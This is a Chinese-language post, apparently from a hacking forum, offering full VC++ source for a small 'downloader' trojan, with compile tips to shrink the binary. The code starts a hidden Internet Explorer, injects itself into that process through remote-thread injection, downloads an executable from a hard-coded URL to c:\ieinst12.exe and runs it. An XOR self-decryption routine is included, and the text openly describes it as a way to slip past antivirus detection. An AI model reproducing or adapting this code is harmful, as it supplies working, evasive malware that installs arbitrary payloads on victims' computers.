无Dll插入进程，下载者VC源代码

更新部份:

增加代码xor解密功能,以逃过杀毒软件.

生成MiNI下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.

参考delphi版本的下载者源代码，编出来有16K左右。压缩也有10K多，

于是写了VC的代码。按以下的设置，编译出来2K左右。

还可以可以再设置一下编译开关，以减小体积。Ps:原代码中4处没有对 \ 转义,以下代码编译通过;

编译出来16K,去掉4行注释,编译后3K(编译环境:Win2003+VC6.0)

/* 
"mini_downloader" 
code by kardinal p.s.t 
compile by vc++ 6.0 
can not run under win98; 
*/ 
#include <windows.h>

#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/OPT:NOWIN98") //取消这4行的注释，可编译出2K大的文件 
//#pragma comment(linker, "/merge:.data=.text") 
//#pragma comment(linker, "/merge:.rdata=.text") 
//#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/ENTRY:decrpt") 
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker, "/BASE:0x13150000")

HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数 
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数 
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //建立远程线程,并运行 
HANDLE processhandle; 
DWORD pid; 
HINSTANCE hshell,hurlmon,hkernel;

void download() //注入使用的下载函数 
{ 
hshell=LoadLibrary("Shell32.dll"); 
hurlmon=LoadLibrary("urlmon.dll");

(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA"); 
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, NULL); 
SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5); 
ExitProcess(0); 
};

void main() //主函数 
{ 
//1.得到IE路径,并运行 
char iename[MAX_PATH],iepath[MAX_PATH]; 
ZeroMemory(iename,sizeof(iename)); 
ZeroMemory(iepath,sizeof(iepath));

GetWindowsDirectory(iepath,MAX_PATH); 
strncpy(iename,iepath,3); 
strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); 
WinExec(iename,SW_HIDE); 
Sleep(500);

//2.得到 IE process handle 
HWND htemp; 
htemp=FindWindow("IEFrame",NULL); 
GetWindowThreadProcessId(htemp,&pid); 
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

//3.分配内存 
HMODULE Module; 
LPVOID NewModule; 
DWORD Size; 
LPDWORD lpimagesize;

Module = GetModuleHandle(NULL);//进程映像的基址 
//得到内存镜像大小 
_asm 
{ 
push eax; 
push ebx; 
mov ebx,Module; 
mov eax,[ebx+0x3c]; 
lea eax,[ebx+eax+0x50]; 
mov eax,[eax] 
mov lpimagesize,eax; 
pop ebx; 
pop eax; 
}; 
Size=(DWORD)lpimagesize; 
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); //确定起始基址和内存映像基址的位置

//4.写内存，创建线程 
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据 
LPTHREAD_START_ROUTINE entrypoint; 
__asm 
{ 
push eax; 
lea eax,download; 
mov entrypoint,eax; 
pop eax 
} 
hkernel=LoadLibrary("KERNEL32.dll"); 
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); 
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行

//5.关闭对象 
CloseHandle(processhandle);

return; 
} ;

//解密函数 
void decrpt() 
{

HANDLE myps; 
DWORD oldAttr; 
BYTE shellcode[500]; 
ZeroMemory(shellcode,sizeof(shellcode)); 
myps=GetCurrentProcess(); 
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); 
//先把原代码,搬移到变量中保存起来 
_asm 
{ 
pushad; 
lea esi,download 
lea edi,shellcode; 
lea ecx,decrpt; 
sub ecx,esi; 
en1: 
lodsb; 
stosb; 
dec ecx; 
jne en1; 
popad;

};

//解密搬回 
int i; 
for (i=1;i<=0xFF;i++) 
{ 
_asm 
{ 
pushad; 
lea esi,shellcode; 
lea edi,download; 
lea ecx,decrpt; 
sub ecx,edi; 
en2: 
lodsb; 
mov ebx,i; 
xor al,bl; 
stosb; 
dec ecx; 
jne en2; 
popad;

};

//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. 
__try 
{ 
main(); 
return; 
} 
__except(EXCEPTION_EXECUTE_HANDLER)

{

};

} 
return; 
};